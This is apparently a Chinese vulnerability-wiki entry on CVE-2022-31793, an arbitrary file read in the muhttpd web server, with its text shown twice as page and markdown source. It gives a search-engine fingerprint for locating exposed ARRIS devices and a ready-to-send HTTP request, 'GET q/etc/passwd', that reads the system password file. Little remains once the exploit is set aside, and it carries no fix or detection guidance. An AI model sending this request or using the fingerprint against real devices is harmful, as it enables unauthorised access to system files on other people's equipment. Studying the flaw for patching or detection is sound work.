fofamini-wiki

登录白背景

源码

muhttpd 任意文件读取漏洞(CVE-2022-31793)

一、漏洞简介

muhttpd（mu-HTTP-deamon）是一个简单但完整的web服务器，用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权，并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。
muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件。

二、影响版本

muhttpd 1.1.7

三、资产测绘

hunter´web.body="2017 ARRIS Enterprises,"
登录页面

四、漏洞复现

GET q/etc/passwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

原文: https://www.yuque.com/xiaokp7/ocvun2/wwv5agegrkqv3s1r

# muhttpd 任意文件读取漏洞(CVE-2022-31793)

# 一、漏洞简介
muhttpd（mu-HTTP-deamon）是一个简单但完整的web服务器，用可移植的ANSI C编写。它支持静态页面、CGI脚本、基于MIME类型的处理程序和HTTPS。它在接受任何连接之前放弃特权，并且可以记录接收到的请求。它已经在GNU/Linux、NetBSD、FreeBSD、Mac OS X和Cygwin上进行了测试。它在32位和64位、小端和大端系统上成功运行。
muhttpd 1.1.7之前版本存在安全漏洞。攻击者利用该漏洞读取系统任意文件。

# 二、影响版本

- muhttpd 1.1.7

# 三、资产测绘

- hunter´`web.body="2017 ARRIS Enterprises,"`
- 登录页面

![image.png](./img/iFm2wBEj_c-ZCDSI/1692626804160-7ce9c950-5510-4c06-9164-547626de254a-316595.png)

# 四、漏洞复现
```
GET q/etc/passwd HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![image.png](./img/iFm2wBEj_c-ZCDSI/1692626840359-dfb18113-93e8-47c7-98e3-f70fbb02ffe9-167399.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wwv5agegrkqv3s1r>